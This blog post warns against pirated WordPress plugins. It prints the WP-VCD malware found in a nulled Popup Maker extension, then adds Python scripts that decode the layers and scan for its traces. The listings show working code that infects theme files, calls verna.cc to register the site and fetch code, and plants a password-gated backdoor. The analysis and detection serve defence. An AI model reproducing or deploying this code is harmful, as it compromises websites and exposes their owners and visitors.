
Another real story about pirated copies of WordPress plugins

01.08.2018

Many WordPress site owners are in the habit of googling warez copies of premium plugins and premium themes, thoughtlessly downloading them from the first site that comes up and installing them on their site straight away. Today I will use a real example to show why this approach is best forgotten.

Not long ago I had a task that could be solved in the two ways traditional for WordPress: buy a plugin, or more precisely an extension for the Popup Maker plugin called Advanced Targeting Conditions, or develop my own solution, for example as a similar plugin with a narrower scope. Unfortunately, not all commercial plugins let you evaluate their features before purchase, and the Popup Maker extensions are no exception. That is how the idea arose to find a pirated version of the plugin, look at it from the inside, test it on a real project and only then make a final decision.

I do not know my way around warez sites. I did not find the extension on the torrent trackers I know, so I simply typed the standard query for such cases into Google: "advanced targeting conditions nulled". The plugin turned up at the very top of the results on a perfectly ordinary warez site called Themesdad.

Direct link to the page: https://www.themesdad.com/popup-maker-advanced-targeting-conditions-v1-2-0/

Having downloaded the archive, I decided to skim the code by eye first; fortunately the extension is tiny, with a minimum of files.

The plugin's file structure raised no suspicion; the file names are quite meaningful.

But that does not mean anything yet.

When I opened the first file, the very first line of code immediately made me uneasy. A developer in their right mind would hardly wedge themselves into the first line of the code to include some file called class.plugin-modules.php.

```php
<?php if (file_exists(dirname(__FILE__) . '/class.plugin-modules.php')) include_once(dirname(__FILE__) . '/class.plugin-modules.php'); ?><?php
/**
 * Plugin Name: Popup Maker - Advanced Targeting Conditions
 * Plugin URI: https://wppopupmaker.com/extensions/advanced-targeting-conditions/
 * Description: Adds advanced targeting conditions.
 * Author: WP Popup Maker
 * Version: 1.2.0
 * Author URI: https://wppopupmaker.com/
 * Text Domain: popup-maker-advanced-targeting-conditions
 * Requires Popup Maker: 1.4.19
 *
 * @author WP Popup Maker
 * @copyright Copyright (c) 2016, WP Popup Maker
 */
```

I decided to see what this file was.

```php
<?php
//install_code1
error_reporting(0);
ini_set('display_errors', 0);
DEFINE('MAX_LEVEL', 2);
DEFINE('MAX_ITERATION', 50);
DEFINE('P', $_SERVER['DOCUMENT_ROOT']);

$GLOBALS['WP_CD_CODE'] = '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';

$GLOBALS['stopkey'] = Array('upload', 'uploads', 'img', 'administrator', 'admin', 'bin', 'cache', 'cli', 'components', 'includes', 'language', 'layouts', 'libraries', 'logs', 'media', 'modules', 'plugins', 'tmp', 'upgrade', 'engine', 'templates', 'template', 'images', 'css', 'js', 'image', 'file', 'files', 'wp-admin', 'wp-content', 'wp-includes');
$GLOBALS['DIR_ARRAY'] = Array();
$dirs = Array();
$search = Array(
    Array('file' => 'wp-config.php', 'cms' => 'wp', '_key' => '$table_prefix'),
);

function getDirList($path)
{
    if ($dir = @opendir($path)) {
        $result = Array();
        while (($filename = @readdir($dir)) !== false) {
            if ($filename != '.' && $filename != '..' && is_dir($path . '/' . $filename))
                $result[] = $path . '/' . $filename;
        }
        return $result;
    }
    return false;
}

function WP_URL_CD($path)
{
    if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS['WP_CD_CODE']))) ) {
        if (strpos($file, 'wp-vcd') === false) {
            $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-vcd.php\')) include_once(dirname(__FILE__) . \'/wp-vcd.php\'); ?>' . $file;
            file_put_contents($path . '/wp-includes/post.php', $file);
            @file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.verna.cc/admin.txt'));
        }
    }
}

function SearchFile($search, $path)
{
    if ($dir = @opendir($path)) {
        $i = 0;
        while (($filename = @readdir($dir)) !== false) {
            if ($i > MAX_ITERATION) break;
            $i++;
            if ($filename != '.' && $filename != '..') {
                if (is_dir($path . '/' . $filename) && !in_array($filename, $GLOBALS['stopkey'])) {
                    SearchFile($search, $path . '/' . $filename);
                } else {
                    foreach ($search as $_) {
                        if (strtolower($filename) == strtolower($_['file'])) {
                            $GLOBALS['DIR_ARRAY'][$path . '/' . $filename] = Array($_['cms'], $path . '/' . $filename);
                        }
                    }
                }
            }
        }
    }
}

if (is_admin() && (($pagenow == 'themes.php') || ($_GET['action'] == 'activate') || (isset($_GET['plugin']))) ) {
    if (isset($_GET['plugin'])) {
        global $wpdb ;
    }
    $install_code = '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';
    $install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
    $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
    $themes = ABSPATH . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes';
    $ping = true;
    $ping2 = false;
    if ($list = scandir( $themes )) {
        foreach ($list as $_) {
            if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')) {
                $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php');
                if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')) {
                    if (strpos($content, 'WP_V_CD') === false) {
                        $content = $install_code . $content ;
                        @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
                        touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time );
                    } else {
                        $ping = false;
                    }
                }
            } else {
                $list2 = scandir( $themes . DIRECTORY_SEPARATOR . $_);
                foreach ($list2 as $_2) {
                    if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php')) {
                        $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php');
                        if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php')) {
                            if (strpos($content, 'WP_V_CD') === false) {
                                $content = $install_code . $content ;
                                @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $content);
                                touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php' , $time );
                                $ping2 = true;
                            } else {
                                //$ping2 = true;
                            }
                        }
                    }
                }
            }
        }
        if ($ping) {
            $content = @file_get_contents('http://www.verna.cc/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
            @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.verna.cc/admin.txt'));
            //echo ABSPATH . 'wp-includes/class.wp.php';
        }
        if ($ping2) {
            $content = @file_get_contents('http://www.verna.cc/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
            @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.verna.cc/admin.txt'));
            //echo ABSPATH . 'wp-includes/class.wp.php';
        }
    }
    for ($i = 0; $i<MAX_LEVEL; $i++) {
        $dirs[realpath(P . str_repeat('/../', $i + 1))] = realpath(P . str_repeat('/../', $i + 1));
    }
    foreach ($dirs as $dir) {
        foreach (@getDirList($dir) as $__) {
            @SearchFile($search, $__);
        }
    }
    foreach ($GLOBALS['DIR_ARRAY'] as $e) {
        //print_r($e);
        if ($file = file_get_contents($e[1])) {
            WP_URL_CD(dirname($e[1]));
            if (preg_match('|\'AUTH_SALT\'\s*\,\s*\'(.*?)\'|s', $file, $salt)) {
                if ($salt[1] != AUTH_SALT) {
                    // WP_URL_CD(dirname($e[1]));
                    //echo dirname($e[1]);
                }
            }
        }
    }
    if ($file = @file_get_contents(__FILE__)) {
        $file = preg_replace('!//install_code.*//install_code_end!s', '', $file);
        $file = preg_replace('!<\?php\s*\?>!s', '', $file);
        @file_put_contents(__FILE__, $file);
    }
}
//install_code_end
?><?php error_reporting(0);?>
```

And for good reason.

Lines 9 and 84 immediately catch the eye: they hold Base64-encoded code (the values assigned to $GLOBALS['WP_CD_CODE'] and $install_code), which in 99 cases out of 100 is malicious. To check it and make sure, it can be decoded and analysed with any online service, for example Base64decode.org.
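The same decoding can be done offline, without pasting the sample into a third-party site and without executing any of it. The sketch below is an added example, not code from the original post: it statically pulls quoted Base64 literals out of PHP source and keeps decoding when a decoded layer contains another literal, as happens with this sample. The function names and the harmless two-layer sample are constructed for illustration.

```python
import base64
import re

# Quoted runs of the Base64 alphabet, long enough to be a payload rather than a token.
B64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/]{40,}={0,2})['"]""")

def decode_literal(text):
    """Return the decoded text, or None if it is not valid Base64 holding UTF-8 text."""
    try:
        return base64.b64decode(text, validate=True).decode("utf-8")
    except ValueError:  # binascii.Error and UnicodeDecodeError both derive from it
        return None

def unwrap_layers(source, max_depth=5):
    """Statically decode Base64 string literals, recursing into decoded layers.

    Returns a list of (depth, decoded_text). Nothing is ever executed.
    """
    layers = []

    def walk(text, depth):
        if depth > max_depth:
            return
        for match in B64_LITERAL.finditer(text):
            decoded = decode_literal(match.group(1))
            if decoded is not None:
                layers.append((depth, decoded))
                walk(decoded, depth + 1)

    walk(source, 1)
    return layers

def build_constructed_sample():
    """Constructed, harmless two-layer sample shaped like the listing above."""
    inner = "<?php /* constructed inner layer: backdoor stub would be here */ ?>"
    middle = "<?php $install_code = '%s'; /* constructed middle layer */ ?>" % (
        base64.b64encode(inner.encode()).decode())
    return "<?php $GLOBALS['WP_CD_CODE'] = '%s'; ?>" % (
        base64.b64encode(middle.encode()).decode())

if __name__ == "__main__":
    for depth, text in unwrap_layers(build_constructed_sample()):
        print("layer", depth, "->", text)
```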

Decoding the first section gives the following code.

```php
<?php

error_reporting(0);
ini_set('display_errors', 0);

$install_code = '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';
$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
$install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
$themes = ABSPATH . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes';
$ping = true;
$ping2 = false;
if ($list = scandir( $themes )) {
    foreach ($list as $_) {
        if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')) {
            $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php');
            if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')) {
                if (strpos($content, 'WP_V_CD') === false) {
                    $content = $install_code . $content ;
                    @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
                    touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time );
                } else {
                    $ping = false;
                }
            }
        } else {
            $list2 = scandir( $themes . DIRECTORY_SEPARATOR . $_);
            foreach ($list2 as $_2) {
                if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php')) {
                    $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php');
                    if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php')) {
                        if (strpos($content, 'WP_V_CD') === false) {
                            $content = $install_code . $content ;
                            @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $content);
                            touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php' , $time );
                            $ping2 = true;
                        } else {
                            //$ping = false;
                        }
                    }
                }
            }
        }
    }
    if ($ping) {
        $content = @file_get_contents('http://www.verna.cc/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
        @file_put_contents(ABSPATH . '/wp-includes/class.wp.php', file_get_contents('http://www.verna.cc/admin.txt'));
    }
    if ($ping2) {
        $content = @file_get_contents('http://www.verna.cc/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
        @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.verna.cc/admin.txt'));
        //echo ABSPATH . 'wp-includes/class.wp.php';
    }
}
?><?php error_reporting(0);?>
```

The sixth line had to be decoded once more; here is what turned out to be inside.

```php
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '{$PASSWORD}')) {
    $div_code_name="wp_vcd";
    switch ($_REQUEST['action']) {
        case 'change_domain';
            if (isset($_REQUEST['newdomain'])) {
                if (!empty($_REQUEST['newdomain'])) {
                    if ($file = @file_get_contents(__FILE__)) {
                        if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code4\.php/i',$file,$matcholddomain)) {
                            $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                            @file_put_contents(__FILE__, $file);
                            print "true";
                        }
                    }
                }
            }
            break;
        default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
    }
    die("");
}

if ( ! function_exists( 'theme_temp_setup' ) ) {
    $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
    if ( stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }

        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle = fopen($tmpfname, "w+");
            fwrite($handle, "<?php\n" . $phpCode);
            fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }

        if($tmpcontent = @file_get_contents("http://www.verna.cc/code4.php")) {
            extract(theme_temp_setup($tmpcontent));
        } elseif($tmpcontent = @file_get_contents_tcurl("http://www.verna.cc/code4.php")) {
            extract(theme_temp_setup($tmpcontent));
        }
    }
}
?>
```

As we can see, this script does nothing good: it quietly leaks data, creates files in a system directory and loads some code into them, which is also unlikely to be of any benefit.

Decoding of the second section.

```php
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '{$PASSWORD}')) {
    $div_code_name="wp_vcd";
    switch ($_REQUEST['action']) {
        case 'change_domain';
            if (isset($_REQUEST['newdomain'])) {
                if (!empty($_REQUEST['newdomain'])) {
                    if ($file = @file_get_contents(__FILE__)) {
                        if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code4\.php/i',$file,$matcholddomain)) {
                            $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                            @file_put_contents(__FILE__, $file);
                            print "true";
                        }
                    }
                }
            }
            break;
        default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
    }
    die("");
}

if ( ! function_exists( 'theme_temp_setup' ) ) {
    $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
    if ( stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }

        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle = fopen($tmpfname, "w+");
            fwrite($handle, "<?php\n" . $phpCode);
            fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }

        if($tmpcontent = @file_get_contents("http://www.verna.cc/code4.php")) {
            extract(theme_temp_setup($tmpcontent));
        } elseif($tmpcontent = @file_get_contents_tcurl("http://www.verna.cc/code4.php")) {
            extract(theme_temp_setup($tmpcontent));
        }
    }
}
?>
```

I did not study this plugin any further and deleted it.
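The artefacts visible in the listings above (the include line prepended to a file, the file names class.plugin-modules.php, wp-vcd.php and class.wp.php, and the WP_V_CD, WP_CD_CODE and //install_code markers) are enough to check an existing installation. This is an added example, not code from the original post; the function names and the sample tree it scans are constructed for illustration.

```python
import os
import re
import tempfile

# Indicators taken from the listings in this post. WordPress core ships
# wp-includes/class-wp.php (hyphen); class.wp.php (dot) is the dropped file.
DROPPED_NAMES = {"class.plugin-modules.php", "wp-vcd.php", "class.wp.php"}
MARKERS = ("WP_V_CD", "WP_CD_CODE", "wp-vcd", "//install_code")
PREPENDED_INCLUDE = re.compile(  # loader line placed before the file's real "<?php"
    r"^\s*<\?php\s+if\s*\(file_exists\(dirname\(__FILE__\)\s*\.\s*'/[\w.\-]+\.php'\)\)"
    r"\s*include_once\(")

def scan_file(path):
    """Return the reasons a PHP file looks infected (empty list if none)."""
    reasons = []
    if os.path.basename(path) in DROPPED_NAMES:
        reasons.append("dropped-file-name")
    with open(path, encoding="utf-8", errors="replace") as handle:
        text = handle.read()
    if PREPENDED_INCLUDE.match(text):
        reasons.append("prepended-include")
    return reasons + ["marker:" + m for m in MARKERS if m in text]

def scan_tree(root):
    """Map relative path -> reasons for every flagged .php file under root."""
    findings = {}
    for folder, _dirs, files in os.walk(root):
        for name in (n for n in files if n.endswith(".php")):
            path = os.path.join(folder, name)
            reasons = scan_file(path)
            if reasons:
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = reasons
    return findings

def demo():
    """Scan a constructed tree: one clean file, one patched plugin, one dropped file."""
    samples = {
        "wp-includes/class-wp.php": "<?php\nclass WP {}\n",
        "wp-content/plugins/demo/demo.php":
            "<?php if (file_exists(dirname(__FILE__) . '/class.plugin-modules.php')) "
            "include_once(dirname(__FILE__) . '/class.plugin-modules.php'); ?><?php\n",
        "wp-content/plugins/demo/class.plugin-modules.php": "<?php //install_code1\n",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            os.makedirs(os.path.join(root, os.path.dirname(rel)), exist_ok=True)
            with open(os.path.join(root, rel), "w", encoding="utf-8") as handle:
                handle.write(body)
        return scan_tree(root)
```

The scan reads file contents rather than trusting timestamps, because the dropper calls touch() to restore the saved time on every functions.php it patches. The installer section also deletes itself from class.plugin-modules.php after running, so the patched functions.php and wp-includes files are the more durable evidence.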

A reminder: free themes and plugins are best downloaded only from the official WordPress repository:

And commercial software should be bought directly from the developer or on specialised marketplaces:

Once again I want to warn all lovers of freebies against rash actions.

Before you download yet another pirated plugin, theme or any other software, think about the people who put it online. Who are these people, why do they do it, who benefits from it, who finances these activities, and what are their real goals?

Are you sure?
